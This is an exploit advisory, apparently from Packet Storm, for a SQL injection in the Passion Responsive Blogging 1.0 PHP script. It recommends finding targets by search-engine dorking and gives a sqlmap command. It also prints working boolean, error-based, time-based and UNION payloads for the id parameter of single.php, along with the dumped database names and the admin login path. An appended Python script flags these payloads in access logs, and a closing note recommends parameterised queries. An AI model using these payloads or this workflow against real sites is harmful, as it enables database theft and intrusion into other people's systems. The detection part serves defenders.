## https://sploitus.com/exploit?id=PACKETSTORM:181409
=============================================================================================================================================  
| # Title : Passion Responsive Blogging 1.0 SQL injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://code-projects.org/responsive-blog-site-in-php-with-source-code/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or other search engine.  
  
[+] use payload : /bmacblog/single.php?id=1 <==== inject here   
  
[+] E:\sqlmap>python sqlmap.py -u https://www.127.0.0.1.com/bmacblog/single.php?id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs  
  
---  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=1' AND 9732=9732-- jEuI  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: id=1' AND (SELECT 2112 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(2112=2112,1))),0x717a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WxeZ  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=1' AND (SELECT 4899 FROM (SELECT(SLEEP(5)))Buaa)-- cfil  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 9 columns  
Payload: id=-6131' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176717a71,0x7067554f5a4b435a75514461626d774c4f517045565a5a6d776e6e766276754e43576176794c5974,0x717a6b7071),NULL,NULL,NULL,NULL-- -  
---  
[23:52:32] [INFO] the back-end DBMS is MySQL  
web application technology: Apache  
back-end DBMS: MySQL >= 5.0 (MariaDB fork)  
[23:52:32] [INFO] fetching database names  
available databases [2]:  
[*] bmac_blog_admin_db  
[*] information_schema  
  
[+] Login : /blogadmin  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================
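
The following is an added example, not part of the original advisory: a Python triage of web-server access logs that flags requests to /bmacblog/single.php whose id parameter is not a plain integer, and labels which of the sqlmap techniques shown above it resembles. The log lines are constructed, and the combined log format, the integer-only id rule and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: single.php only ever needs a numeric post id.
VALID_ID_RE = re.compile(r"[0-9]{1,10}")
# One pattern per sqlmap technique listed in the output above.
TECHNIQUES = [
    ("union", re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)),
    ("time-based", re.compile(r"\bsleep\s*\(", re.I)),
    ("error-based", re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I)),
    ("boolean", re.compile(r"'\s*(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
]

def classify_id(value):
    """Return None for a well-formed id, else a label for the anomaly."""
    if VALID_ID_RE.fullmatch(value):
        return None
    for label, pattern in TECHNIQUES:
        if pattern.search(value):
            return label
    return "non-integer"  # anything else that is not a plain number

def triage(log_lines, script="/bmacblog/single.php"):
    """Return (line_number, label) for each suspicious id sent to script."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if target.path != script:
            continue
        # parse_qs URL-decodes; keep blanks so an empty id is still checked
        for value in parse_qs(target.query, keep_blank_values=True).get("id", []):
            label = classify_id(value)
            if label:
                findings.append((n, label))
    return findings

PREFIX = '192.0.2.10 - - [01/Jan/2025:23:52:30 +0000] "GET /bmacblog/'
SAMPLE_LOG = [  # constructed lines; 192.0.2.10 is a documentation address
    PREFIX + 'single.php?id=1 HTTP/1.1" 200 5120',
    PREFIX + 'single.php?id=1%27%20AND%209732%3D9732--%20jEuI HTTP/1.1" 200 5120',
    PREFIX + 'single.php?id=1%27%20AND%20(SELECT(SLEEP(5)))--%20x HTTP/1.1" 200 5120',
    PREFIX + 'single.php?id=-6131%27%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 5120',
    PREFIX + 'single.php?id=7abc HTTP/1.1" 200 5120',
]
print(triage(SAMPLE_LOG))
```

Detection only narrows the window; the fix belongs in the application, where id should be validated as an integer and bound as a parameter in a prepared statement instead of being concatenated into the query.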